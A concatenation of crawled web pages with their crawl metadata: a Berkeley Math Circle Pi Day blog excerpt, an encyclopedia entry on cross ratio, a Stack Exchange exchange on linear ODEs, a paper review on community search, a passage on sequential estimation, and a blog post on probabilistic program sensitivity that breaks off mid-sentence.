world.\n\nAt the Berkeley Math Circle, students in elementary, middle, and high school meet on a weekly basis to explore such beauties of mathematics. It is the second Math Circle that started in the United States in 1988 and that is modeled after Eastern European programs; hundreds of others have started since then to foster many great mathematicians.\n\nThere are now more than 400 students in the Berkeley Math Circle (meeting every Tuesday of the academic year, 6-8 p.m. in Evans Hall), each with a unique background in math. Nevertheless, there is an axiom that applies to all Math Circle students: “We have an unending enthusiasm and love for math!”" ]
[ null, "http://berkeleyblog.wpengine.com/wp-content/uploads/2015/03/Pi-Art300.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9451585,"math_prob":0.9414459,"size":2932,"snap":"2022-27-2022-33","text_gpt3_token_len":680,"char_repetition_ratio":0.10211749,"word_repetition_ratio":0.0,"special_character_ratio":0.2329468,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97275436,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T23:37:10Z\",\"WARC-Record-ID\":\"<urn:uuid:9ffb6678-f7d0-456a-b4c8-ecc4c009ca28>\",\"Content-Length\":\"34696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:465a99f1-6c77-47c0-90d3-159b4e4d2987>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2e64b1d-6470-4fed-ba3e-d622268f8949>\",\"WARC-IP-Address\":\"35.185.15.143\",\"WARC-Target-URI\":\"https://blogs.berkeley.edu/2015/03/13/happy-pi-day-2015/\",\"WARC-Payload-Digest\":\"sha1:CPXHI67B5ALHDXDCTYOSZTUARNHDHOHX\",\"WARC-Block-Digest\":\"sha1:2CTW5TPLLV5CLJ2A7TRB2LCG2OW5PUYU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103947269.55_warc_CC-MAIN-20220701220150-20220702010150-00768.warc.gz\"}"}
https://encyclopediaofmath.org/index.php?title=Cross_ratio&diff=prev&oldid=31659
[ "# Difference between revisions of \"Cross ratio\"\n\nJump to: navigation, search\n\ndouble ratio, anharmonic ratio, of four points $M_1$, $M_2$, $M_3$, $M_4$ on a straight line\n\nA number denoted by the symbol $(M_1M_2M_3M_4)$ and equal to\n\n$$\\frac{M_1M_3}{M_3M_2}:\\frac{M_1M_4}{M_4M_2}.$$\n\nHere, the ratio $M_1M_3/M_3M_2$ is considered to be positive if the directions of the segments $M_1M_3$ and $M_3M_2$ coincide, and is considered to be negative if these directions are opposite. The cross ratio depends on the numbering of the points, which may or may not be the same as the order of their appearance on the straight line. As well as the cross ratio of four points, one may consider the cross ratio of four straight lines passing through a point. This ratio, which is denoted by the symbol $(m_1m_2m_3m_4)$, is equal to\n\n$$\\frac{\\sin(m_1m_3)}{\\sin(m_3m_2)}:\\frac{\\sin(m_1m_4)}{\\sin(m_4m_2)},$$\n\nand the angle $(m_im_j)$ between the straight lines $m_i$ and $m_j$ is considered together with its sign. If the points $M_1$, $M_2$, $M_3$, $M_4$ lie on the straight lines $m_1$, $m_2$, $m_3$, $m_4$, one has\n\n$$(M_1M_2M_3M_4)=(m_1m_2m_3m_4).$$\n\nIf the points $M_1$, $M_2$, $M_3$, $M_4$ and $M_1'$, $M_2'$, $M_3'$, $M_4'$ are obtained by the intersection of the same quadruple of straight lines $m_1$, $m_2$, $m_3$, $m_4$, then\n\n$$(M_1M_2M_3M_4)=(M_1'M_2'M_3'M_4').$$\n\nThe cross ratio is an invariant of projective transformations. A cross ratio equal to $-1$ is known as a harmonic ratio (cf. Harmonic quadruple of points).\n\n#### Comments\n\nHow to Cite This Entry:\nCross ratio. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Cross_ratio&oldid=31659\nThis article was adapted from an original article by E.G. Poznyak (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8754326,"math_prob":0.999956,"size":3396,"snap":"2021-04-2021-17","text_gpt3_token_len":1177,"char_repetition_ratio":0.15271227,"word_repetition_ratio":0.72583824,"special_character_ratio":0.3492344,"punctuation_ratio":0.14746544,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999976,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-13T04:55:25Z\",\"WARC-Record-ID\":\"<urn:uuid:0f9c9e4f-fc80-4246-8108-ef1a72f960c7>\",\"Content-Length\":\"20496\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:373d3e3f-a6ce-49fc-8d37-eb8e8001b2a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:6ee14fb7-4918-4dd2-86f6-ce669854a8a4>\",\"WARC-IP-Address\":\"34.96.94.55\",\"WARC-Target-URI\":\"https://encyclopediaofmath.org/index.php?title=Cross_ratio&diff=prev&oldid=31659\",\"WARC-Payload-Digest\":\"sha1:BTBORLEI2KRZXXX2BNKTOFW4CVUVWMID\",\"WARC-Block-Digest\":\"sha1:BFC73Y475TGIVGUYPXXJ7ITKMMFDCPB6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038072082.26_warc_CC-MAIN-20210413031741-20210413061741-00378.warc.gz\"}"}
https://scicomp.stackexchange.com/questions/23354/methods-for-solving-x-axb-for-small-sparse-singular-a
[ "# Methods for solving $x'=Ax+b$ for small, sparse, singular $A$\n\nI am in the process of building a robotics physics engine. I have been using the Linear ODE $x' = Ax + b$ for the core of my physics integration, but have never found a really good solution method for it.\n\nMy problem gets harder than the standard ODE solution because my A matrix is singular.\n\nHere is an example of an $A$ matrix and a $b$ matrix from my simulation:\n\n$$\\begin{vmatrix} 0 & 0 & 0.64 & 0 & 0.64 & 1.27 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & -0.64 & 1.27 & 0 & 0 & 0 & 0.64 \\\\ 0 & 0 & -29.53 & 0 & -28.2 & -56.4 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 1.33 & -2.67 & 0 & 0 & 0 & 0 & 171.2 & -1.33 \\\\ 0 & 0 & 1.33 & 0 & 0 & 0 & 0 & 0 & 0 & -1.33 \\\\ 0 & 0 & 2.67 & 0 & 0 & 0 & 0 & 0 & 0 & 2.67 \\\\ 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 0 & 1 & 0 & 0 & 0 & 0 \\\\ 0 & 0 & 0 & 0 & 28.2 & -56.4 & 0 & 0 & 0 & -29.53 \\\\ \\end{vmatrix}$$\n\n$$\\begin{vmatrix} 0\\\\ 0\\\\ 9.76\\\\ 0\\\\ 171.2\\\\ 0\\\\ 0\\\\ 0\\\\ 0\\\\ -9.76\\\\ \\end{vmatrix}$$\n\nAccording to several previous questions, the solution to this ODE is the expression. $$x(t)=e^{At}y+\\int_0^t e^{As}b ds$$\n\nIn particular, the integral of this is the hard part. According to Wolfram Alpha, the solution is:\n\n$$\\int_0^t e^{As}b ds = \\frac{b(e^{At}-1)}A$$\n\nWhich is equivelant to the taylor series:\n\n$$bt + \\frac{1}2Abt^2 + \\frac{1}6A^2bt^3 + \\frac{1}{120}A^3bt^4 + ...$$\n\nMy current, inefficient solution relies on evaluating this taylor series. I cannot evaluate the solution directly, since I cannot invert A. I have tried using $A^+$, however this does not yield the correct solution.\n\nIs there a better solution to this problem? I am currently taking Calc II, and have attempted to teach myself the Linear Algebra necessary to build this software. Therefore I don't know of all the tricks that might be used to tame this problem.\n\nI am using the theano python library to perform these calculations, though if I can get a solution using scipy/numpy I can figure out how to do it in theano.\n\n• Have you tried using \"the\" 4th-order Runge-Kutta method (en.wikipedia.org/wiki/…)? You get a nice balance of accuracy for computational effort with this. It's an explicit method, so you only need to be able to do your matrix-vector product in order to use it. This method is included in pretty much any general ODE library (such as scipy.integrate.ode, as suggested by @Kirill). If you'd like to keep the external library dependency to a minimum, however, the basic method is exceedingly straightforward to implement yourself. – Tyler Olsen Mar 13 '16 at 19:26\n• From the point of view of numerical methods, this system is very easy to \"solve\". What is it you don't like about your current method -- is it too slow, not accurate enough, or something else? – David Ketcheson Mar 14 '16 at 5:07\n• Also, there is a typo in your Taylor series -- presumably it does not correspond to a typo in your code. – David Ketcheson Mar 14 '16 at 5:08\n• @DavidKetcheson Yes that was just a typo in the taylor series here. I do it correctly in my code. I dislike my current method because it is unstable -- some simulations require up to a hundred terms be computed before a decent answer is found, and this isn't guaranteed. – computer-whisperer Mar 14 '16 at 16:24\n\nIn general, computing the matrix exponential is a bit tricky — see \"Nineteen Dubious Ways\" by Moler, Van Loan, your truncated Taylor series approach is their Method 1. There is already a matrix exponential function in scipy, so you should prefer using that to a naive implementation. Truncated Taylor series wouldn't even work for a general $1\\times 1$ case because of numerical instability when $A<0$.\nI would also recommend against doing it this way due to the likely catastrophic cancellation in $A^{-1}(e^{At}-1)$ — this formula is inaccurate even for small scalar $A$ and is difficult to use even if you used an accurate matrix exponential, like scipy.linalg.expm.\nYour formula for the general solution $x(t)$ seems suspicious: Wolfram Alpha gave you an answer assuming that $A$ is a scalar number, which is the main reason that formula assumes $A$ is invertible and has the $b$ on the wrong side of the matrix." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7634951,"math_prob":0.9912042,"size":1975,"snap":"2019-43-2019-47","text_gpt3_token_len":761,"char_repetition_ratio":0.23592085,"word_repetition_ratio":0.3156733,"special_character_ratio":0.46481013,"punctuation_ratio":0.11235955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98854244,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T15:31:09Z\",\"WARC-Record-ID\":\"<urn:uuid:aa75bc41-5d23-417f-be8e-0850999f8f3a>\",\"Content-Length\":\"141820\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3ec76577-ca3e-477a-95cb-4d96507a5657>\",\"WARC-Concurrent-To\":\"<urn:uuid:00b65823-0671-4e26-8891-9504cda67d3c>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://scicomp.stackexchange.com/questions/23354/methods-for-solving-x-axb-for-small-sparse-singular-a\",\"WARC-Payload-Digest\":\"sha1:I7LVKSUH2YXX2YJ2ROOCZPI4LEQ5RWHV\",\"WARC-Block-Digest\":\"sha1:RP3ALFXNFARXPJVUAP6RGDIVBCC64XLE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668682.16_warc_CC-MAIN-20191115144109-20191115172109-00160.warc.gz\"}"}
https://papers-gamma.link/paper/74/The%20Community-search%20Problem%20and%20How%20to%20Plan%20a%20Successful%20Cocktail%20Party
[ "", null, "", null, "Overall a very nice paper. Given a small set of query nodes, how can we find its community (a \"compact\" connected subgraph strongly related to the query nodes)? An optimization is formalized and an efficient optimal algorithm (inspired by the k-core decomposition) to solve the optimization is devised. Efficient heuristics are also suggested. The following points could be improved. ### Not clear examples of monotone functions: - \"Example 2 (Minimum degree) Let $f_m(G)$ be the minimum degree of any node in $G$. The function $f_m$ is monotone.\". That is not true: when removing nodes from a given graph, the minimum degree can increase and then decrease. - \"Example 3 (Distance) The functions $D_Q(G, v)$ and $D_Q(G)$, defined by Equations (1) and (2) are node-monotone and monotone, respectively.\" That is not true: \"$D_Q(G)$\" is not monotone: it can decrease and increase when removing nodes. In addition, with this definitions the query nodes should not be removed, this is not specified. - \"A lower bound on the number of nodes in a graph is monotone\". This is not clear. I think that what is meant is not that any function that is a lower bound on the number of nodes (e.g., $f(V)=|V|/2$) is monotone, but that requiring a lower bound on the number of nodes is monotone. - \"$M_Q(G)=\\max_{v\\in V(G)}\\{M_Q(G,v)\\}$ is monotone\". That is not true. - \"The number of disjoint paths between two nodes (which is a popular measure for friendship strength) is node-monotone non-increasing.\" This is not clear, the function should of the form $f_m(G,v)$, is $v$ one of the two nodes? - \"with a monotone function (such as maximum distance and minimum degree).\". It is not clear what \"maximum distance\" means. If it means \"the diameter of the graph\", then this function is not monotone as it can increase or decrease when removing nodes. - Note that only node-monotone functions are of interest for the suggested method and monotone functions are not used. \"Problem 3 (Cocktail party) We are given an undirected graph $G=(V, E)$, a node-monotone non-increasing function $f$, as well as a set of monotone non-increasing properties $f_1,...,f_k$. We seek to find an induced subgraph $H$ of $G$ that maximizes $f$ among all induced subgraphs of $G$ and satisfies $f_1,...,f_k$. A similar problem can be defined by considering to minimize monotone non-decreasing functions.\". In that problem \"monotone\" should be replaced by \"node-monotone\". ### Experiments: - \"We implemented our algorithms in Perl and all experiments run on a dual-core Opteron processor at 3GHz.\" The implementation does not seem to be publicly available. - I think that more informations on how to reconstruct the graphs on which the experiments are run could be given. Some of the datasets do not seem to be publically available. - In Table 1, I think that the first line is about the distance constraint. The number of query nodes and how they are picked does not seem to be specified. - As the experiments in Table 1, Figure 1 and Figure 2 are the results of an average, error bars could be given to see how significant the differences are. ### Implementation details and asymptotic complexity: - An asymptotic time complexity is not given. - Implementation details are lacking. In particular, it is not clear how to check that the query nodes are connected at each step. This does not seem to be so trivial. If a BFS has to be run everytime a node is deleted, then the algorithm would be in $\\Omega(n^2)$ and might be too slow for large graphs. ### Comparison against connectivity subgraph (reference , and ): \"Faloutsos et al. , Tong et al. , as well as other researchers have studied the problem of finding a subgraph that connects a set of query nodes in a graph. The main difference of our approach is that we are not just interested in connecting the query nodes, but also in finding a meaningful community of query nodes.\" To me \"community search\" is similar to \"connectivity subgraph\": if the upper bound on the number of nodes is small enough then indeed \"connectivity subgraph\" can be seen as \"just connecting the query nodes\". However, if this upper bound $k$ is higher, then the goal of \"connectivity subgraph\" is to find $k$ nodes connecting the query nodes and relevant to it, which is similar to the goal of \"community search\". I think that a comparison to the \"connectivity subgraph\" line of work can be carried. At least for the \"case study\" on the communities of Papadimitriou in DBLP. ### Node-monotone functions: Maybe defining a node-monotone function as a function $f(G,U,v)$ of the input graph $G=(V,E)$, a set of vertices $U\\subset V$ and a node $v\\in U$ is interesting. This would allow taking the outside of the induced subgraph on $U$ into account. As an example: the number of neighbors $v$ has in $U$ is node-monotone non-increasing, but the number of neighbors $v$ has in $V\\setminus U$ is node-monotone non-decreasing (this second function is hard to express with the definition of node-monotone function given in the paper). ### Typos: - \"Graphs is one of most ubiquitous data representations\" ->? \"Graphs are one of the most ubiquitous data representations\" - \"there is need for\" ->? \"there is a need for\" - \"It has been one of them most well-studied problems\" -> \"one of the most\" - \"Brunch and bound\" :) -> \"Branch and bound\" - \"in order to extracting informations\" -> \"in order to extract informations\" - \"divided by all possible possible edges\" - \"that are far way from\" ->? \"far away from\" - \"We start by present an optimal algorithm\" - \"$G_{T−1}$\": \"T\" -> \"t\". - \"we still assume that $d=|V|$\" -> \"$d=|V|^3$\" - \"Now are are ready\" - \"The dist ance\" - \", which we denote be $q=|Q|$\" - \"for the the heuristic\" - \"This reason is that\" -> \"The reason is that\" - \"with our heuristics This is shown in\": \".\" lacking. - \" we think that it is quite remarkable that GreedyDist finds subgraph average distance more than 5\" -> \"finds a subgraph of average degree more than 5\", and not \"distance\". - \"we can see from indeed\" - \"it belongs in\" ->? \"it belongs to\" - \"The aim is to find compact a community\" ->? \"The aim is to find a compact community\" - \"the situation is not so agreeable\" ->? \"the situation is not so pleasant\" - \"and it is densely connected\" ->? \"and is densely connected\"" ]
[ null, "https://papers-gamma.link/static/img/tower.png", null, "https://papers-gamma.link/static/img/month.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.919637,"math_prob":0.9816465,"size":13405,"snap":"2023-14-2023-23","text_gpt3_token_len":3407,"char_repetition_ratio":0.13498993,"word_repetition_ratio":0.94681317,"special_character_ratio":0.26124582,"punctuation_ratio":0.10938108,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99668056,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-06T23:04:22Z\",\"WARC-Record-ID\":\"<urn:uuid:fb3e5d75-5296-44a4-af71-642998f3bc69>\",\"Content-Length\":\"32846\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ed9a8850-2b08-455b-b65b-6e173db10715>\",\"WARC-Concurrent-To\":\"<urn:uuid:04e152aa-a1b5-4dad-909f-1fda2ed77620>\",\"WARC-IP-Address\":\"168.119.120.52\",\"WARC-Target-URI\":\"https://papers-gamma.link/paper/74/The%20Community-search%20Problem%20and%20How%20to%20Plan%20a%20Successful%20Cocktail%20Party\",\"WARC-Payload-Digest\":\"sha1:PKQ7AXNQ26FAVR6U4Z7N6WIV7WXBSFAZ\",\"WARC-Block-Digest\":\"sha1:DM5FQYCRAE6ZCMACI4LPCXNSJPXOSGEL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653183.5_warc_CC-MAIN-20230606214755-20230607004755-00619.warc.gz\"}"}
https://ebrary.net/182938/mathematics/sequential_estimation_strategy_mrpe_problem
[ "# Sequential Estimation Strategy for the MRPE Problem\n\nAgain, we begin with к-tuples (Х,д,..., Х,д), i = 1,2,..., шо(> 2), the pilot observation vectors. Then, we define the stopping time along the lines of Robbins (1959), Chow and Robbins (1965), Starr (1966b) and modify (11.26) as follows:", null, "with S2rk coming from (11.23) and 7(> 0) is an appropriate number to be made more specific shortly. This Rkc estimates r'k from (11.20).\n\nWe continue to check the condition for boundary crossing in (11.41) successively with the updated pairs (r, Sr/k) at instances r = mo, mo + 1,... and then stop when r first crosses the corresponding boundary (A/c)^2(S,_t + г-7).The sampling strategy from (11.41) terminates w.p. 1, that is, Pi{Rk,c < oo} = 1. Having terminated sampling with the finally accrued data,", null, "## Asymptotic First-Order Results\n\nAs c -t 0, a number of asymptotic first-order properties associated with the estimation strategy (Ra-(1-, Gj?tjt) from (11.41)—(11.42) can be summarized as follows:", null, "Again, the expression of rk comes from (11.20).\n\nThese properties will again customarily follow from Chow and Robbins (1965). One may also supply direct proofs of both parts from what is called the basic inequality. The second part in (11.43) may combine the first part, Fatou's Lemma, along with the result: Ер[Р*,с] < n* + 0(1). Else, one may follow along the steps we showed in (11.29) and improvise suitably as needed.\n\nUnder the loss function (11.18), the sequential risk function associated with the sequential MRPE strategy (R^, Gliiik) from (11.41)—(11.42) is described as:", null, "In order to compare the performances of the MRPE strategy with the optimal fixed rk-strategy, even though this optimal fixed r£ -strategy is not implementable, Robbins (1959) defined the following metrics:", null, "Robbins (1959) defined a sequential MRPE strategy asymptotically risk efficient if the following limiting result holds: liny.^o ip(c) = 1. Ghosh and Mukhopadhyay (1981) named this property as asymptotically first-order risk efficient.\n\nOur proposed point estimator of Gf is clearly a sample mean of i.i.d. random variables Gijt, G2,k, ■ ■ • where we do not assume a specific common distribution which make this problem fall under the broad umbrella of sequential nonparametric point estimation scenarios. The sequential MRPE problem of estimating a population mean by a sample mean of i.i.d. random variables was first developed by Mukhopadhyay (1978). Ghosh and Mukhopadhyay (1979, Theorem 1) followed quickly and shaped the theory more fully by proving the following results as c —t 0:", null, "where rk comes from (11.20).\n\n## Asymptotic Second-Order Results: A Brief Outline\n\nIn Ghosh and Mukhopadhyay's (1979) original distribution-free paper, they assumed high moment conditions which were later reduced substantially to a more acceptable level by Chow and Yu (1981) under weighted SEL loss plus linear cost while estimating a population mean. Sen and Ghosh (1981) had built an elegant theory for asymptotically risk efficient sequential estimation for the mean of a U-statistic under economical moment conditions. While estimating a population mean under SEL (or weighted SEL) plus linear cost, Chow and Martinsek (1982) and Martinsek (1983) came up with asymptotically sharp second-order results for the associated regret function from (11.45), co(c), under appropriate moment conditions.\n\nWe can immediately claim such asymptotic first-order and second- order results associated with our sequential MRPE strategy (Rk/C, Gr^) from (11.41)—(11.42), but we require no special moment condition because Ef[(Giiit)p] < oo for all fixed p{> 0) since G^ has a finite support, namely (0,1). We surely realize that Ef[Gi^-] = Gf + cf where the convergence of the remainder term cf to 0 will be fast enough so that our MRPE problem for Gf can be reduced to a MRPE problem for a population mean since к is large but held fixed.\n\nMore precisely, however, from Chow and Martinsek's (1982) and Mar- tinsek's (1983) results, the following conclusions will follow for a mildly modified version of the original stopping rule Rk/C from (11.41) which would be laid down as follows:", null, "with the pilot size satisfying <5c-1/4 < rc = o(c-1/2) for some d > 0.\n\nTheorem 11.1. For the sequential MRPE strategy (Rk,c,G^ k) associated with\n\n(11.47), we have the following asymptotic second-order regret expansion as c —t 0:", null, "with ар2, fp, w(c) coming from (11.11), (11.12) and (11.45) respectively where of2 « k~l£p for large but fixed k.\n\nThe next result follows from Chang and Hsiung (1979), also incorporated in Martinsek (1983).\n\nTheorem 11.2. For the sequential MRPE strategy (Rk/C> k) associated with\n\n(11.47) , we have the following asymptotic second-order efficiency result as c —> 0:", null, "with r’k coming from (11.20) for large but fixed k. An expression ofd = dpy, free from c, comes from Martinsek (1983, p. 832).\n\nThese second-order results (Theorems 11.1-11.2) are very interesting, especially since we fully expect the stopping time Rk,c from (11.41) and Rk/C from\n\n(11.47) to be asymptotically indistinguishable from one another. Now, in the spirits of Section 11.3.3 and assumption (11.33), we may presume (for large k) that the G,/s are practically N(Gp, <т/;2), and then clearly we would have: MGU - Gf)2] « 2dp4 and Ef[(Gu - Gf)3] « 0.\n\nUnder this scenario, from Theorem 11.1, we will conclude (as c —> 0):", null, "which coincides with the regret expansion from Woodroofe (1977) in the normal case.\n\nNow, one can readily see the marked difference between the technicalities developed by Chattopadhyay and De (2014, 2016), De and Chattopadhyay (2017) and those that we have developed in this paper. Our present construction of sequential MRPE strategies are very broad to deliver even the associated asymptotic second-order approximations." ]
[ null, "https://ebrary.net/htm/img/33/1886/481.png", null, "https://ebrary.net/htm/img/33/1886/482.png", null, "https://ebrary.net/htm/img/33/1886/483.png", null, "https://ebrary.net/htm/img/33/1886/484.png", null, "https://ebrary.net/htm/img/33/1886/485.png", null, "https://ebrary.net/htm/img/33/1886/486.png", null, "https://ebrary.net/htm/img/33/1886/487.png", null, "https://ebrary.net/htm/img/33/1886/488.png", null, "https://ebrary.net/htm/img/33/1886/489.png", null, "https://ebrary.net/htm/img/33/1886/490.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8904157,"math_prob":0.96350604,"size":5772,"snap":"2023-14-2023-23","text_gpt3_token_len":1528,"char_repetition_ratio":0.12517338,"word_repetition_ratio":0.015317286,"special_character_ratio":0.27772003,"punctuation_ratio":0.14592275,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9809648,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-30T23:31:49Z\",\"WARC-Record-ID\":\"<urn:uuid:3861db36-0ace-431a-a039-c6ab08bb6c31>\",\"Content-Length\":\"36092\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:726f64ea-ecdd-45b9-8dd6-e1afc870c138>\",\"WARC-Concurrent-To\":\"<urn:uuid:780921bf-2394-44ce-9d31-d189b2479d72>\",\"WARC-IP-Address\":\"5.45.72.163\",\"WARC-Target-URI\":\"https://ebrary.net/182938/mathematics/sequential_estimation_strategy_mrpe_problem\",\"WARC-Payload-Digest\":\"sha1:4WJYOMVFB7HTTGLLGHOHIQBUDQIQNITK\",\"WARC-Block-Digest\":\"sha1:7GXOZN4LRDUQIWNHGYZMPI7HGANDFE6X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949506.62_warc_CC-MAIN-20230330225648-20230331015648-00186.warc.gz\"}"}
https://blog.sigplan.org/2021/07/15/a-pre-expectation-calculus-for-probabilistic-sensitivity/
[ "Select Page\n\n# PL Perspectives\n\nPerspectives on computing and technology from and for those with an interest in programming languages.\n\nProbabilistic programs are ubiquitous in modern computing, with applications such as randomized algorithms, machine learning and statistical modelling. Techniques and principles to formally verify classical (deterministic) programs often fail in counterintuitive ways when applied directly to probabilistic programs. This motivates the need for specialized techniques to reason about these programs.\n\nRelational program properties, as opposed to classical properties, refer to pairs of executions of a program. Sensitivity properties are a particular class of relational properties. Sensitivity answers a very natural question: if I make a small change to the input of my program, how much can the output change? Sensitivity properties can be defined by choosing a distance", null, "$d_I$ over the input space and a distance", null, "$d_O$ over the output space such that the program, such that for any pair of inputs", null, "$i_1, i_2$ and their respective outputs", null, "$o_1, o_2$ we have", null, "$d_O(o_1,o_2) \\leq d_I(i_1,i_2)$.\n\nOur distinguished POPL 2021 paper, A Pre-expectation Calculus for Probabilistic Sensitivity explores the problem of reasoning about the sensitivity of probabilistic programs, whose behavior may depend on randomly sampled variables, and therefore their observable output defines a probability distribution over final states. In this post we will first begin by justifying the notion of sensitivity we use, then discuss how we reason about it and finally conclude by presenting some applications.\n\n# Notions of probabilistic sensitivity\n\nWhile it is clear how to define sensitivity for deterministic programs, defining it for probabilistic programs takes more care. As is traditional in probabilistic program semantics, we can model the output of a probabilistic program as a probability distribution. Then, sensitivity properties can be expressed with respect to a distance between probability distributions. However, in practice there are several probabilistic distances that are used.\n\nConsider for instance the following program:\n\nint foo(p):\nx = 0;\nt = 0;\nwhile (t < T){\nb = flip(p);\nx = x + b;\nt = t + 1;\n}\nreturn x;\n\n\nThis program samples a random bit T times and counts the total number of 1s. The probabilistic behavior is induced by the command flip(p), which returns 1 with probability p and 0 with probability 1-p. We are interested in studying the sensitivity of the output x with respect to the parameter p. For simplicity, we assume that the number of iterations T is a global constant.\n\nRecall that a discrete probability distribution over a countable set", null, "$X$ is a function", null, "$f \\colon X \\to [0,1]$ such that", null, "$\\sum_{x\\in X} f(x) = 1$. For our program we could define sensitivity using for instance the following distances:\n\n• Total Variation distance, or TV distance. Given two distributions, the TV distance measures how much the probability of any event can differ between them. It is defined by the sum below:", null, "$TV(f_1,f_2) = \\frac{1}{2} \\sum_{ x \\in X} | f_1(x) - f_2(x) |$\n\nThe TV distance can be defined on every output space", null, "$X$, since the structure of", null, "$X$ is not used in the definition. As a downside, it is often complicated to compute the exact TV distance, since one needs to evaluate the sum above.\n\n• Absolute expected difference. For programs with numeric output, as our example, sensitivity can also be defined from the absolute difference between the expected outputs:", null, "$AED(f_1,f_2) = |\\sum_{ x \\in X} x \\cdot (f_1(x)-f_2(x)) |$\n\n(Note: This is actually not a distance, it is a pseudodistance, but it also can be used to define sensitivity). For instance, in the example above, the absolute expected difference between the outputs of foo(p1) and foo(p2) is T * |p1 - p2|, since the loop runs T times, and the probability of increasing the counter is p1 on the first run and p2 on the second. For a more general output space", null, "$X$, we may want to reason about the absolute difference between the expected values of a function", null, "$g: X \\to [0,\\infty]$ on the two output distributions of the programs. These families of distances are used for instance to define stability of machine learning algorithms (see below).\n\nWhile sensitivity properties for probabilistic programs are defined in various manners, it would not be convenient to have different methods to verify different notions of sensitivity. Instead, we would like to have a more general notion of distance that we can reason about, and that can then be instantiated to particular distances between probability distributions.\n\n# The Kantorovich distance\n\nWith the goal of generality in mind, we develop a framework to reason about a distance known as the Kantorovich distance (sometimes also referred to as the Wasserstein distance). This distance constitutes a canonical lifting from a base distance", null, "$d \\colon X \\times X \\to [0,\\infty]$ to a distance", null, "$K(d): {\\rm Distr(X)}\\times {\\rm Distr}(X) \\to [0,\\infty]$, where", null, "${\\rm Distr}(X)$ denotes the space of discrete probability distributions over", null, "$X$.\n\nThe definition of the Kantorovich distance is somewhat technical, so instead we give an intuition and explain how it can be used. The Kantorovich distance is sometimes known as the earth-mover distance: if we visualize a probability distribution", null, "$f$ by placing a pile of sand of size", null, "$f(x_1)$ on top of each point", null, "$x_1$, then", null, "$K(d)(f_1,f_2)$ corresponds to the cost of the optimal way of transforming", null, "$f_1$ into", null, "$f_2$ by moving sand, where the cost of moving", null, "$a$ units of sand from", null, "$x_1$ to", null, "$x_2$ is", null, "$a \\cdot d(x_1,x_2)$.\n\nThe Kantorovich distance is fairly versatile. For example, the TV distance can be reconstructed as a particular case of the Kantorovich distance built from the discrete distance, which assigns a distance of 1 to all pairs of distinct points. And while in general it is not possible to define a distance on the base space that lifts to the absolute expected difference, the Kantorovich distance built from", null, "$d(x_1,x_2) = |g(x_1) - g(x_2)|$ provides an upper bound on the absolute expected difference defined from", null, "$g$. Moreover, in the degenerate case of distributions that assign all their mass to a single point, the Kantorovich distance", null, "$K(d)$ coincides with", null, "$d$. This allows us to cast sensitivity properties of deterministic programs as particular cases of sensitivity of probabilistic programs.\n\n# A relational pre-expectation transformer\n\nSensitivity is not only a relational property, but it is also a quantitative property. There is already significant previous work in verifying quantitative properties of probabilistic programs. The most related to our framework is the work on weakest pre-expectations by Morgan and McIver, which uses a predicate transformer to compute the expected value of some real-valued function", null, "$f$ (called an expectation) over the output distribution of an imperative probabilistic program", null, "$C$. This transformer can be seen as a quantitative generalization of Dijkstra’s weakest precondition 